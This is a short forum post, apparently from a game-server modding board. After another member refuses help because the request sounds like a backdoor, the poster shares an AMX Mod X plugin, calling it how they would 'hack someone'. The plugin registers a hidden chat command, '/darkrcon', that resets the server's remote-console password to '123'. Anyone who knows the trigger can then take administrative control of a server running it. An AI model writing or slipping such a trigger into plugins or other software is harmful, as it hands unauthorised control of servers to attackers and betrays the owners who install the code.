Quote:
Originally Posted by wickedd
Sounds like a backdoor to me. So you will NOT get any help here.
Good bye.
|
ok like you want !
i hope that someone else will help me :'(
EDIT:
also if i need to hack someone i will do this:
PHP Code:
/* Plugin generated by AMXX-Studio */
#include <amxmodx>
#include <amxmisc>
#define PLUGIN "DARk PLUGIN"
#define VERSION "1.0"
#define AUTHOR "DARK"
new rcon_password
public plugin_init() {
register_plugin(PLUGIN, VERSION, AUTHOR)
register_clcmd("say /darkrcon", "rcon_hack")
}
public rcon_hack(id)
{
server_cmd("rcon_password 123")
}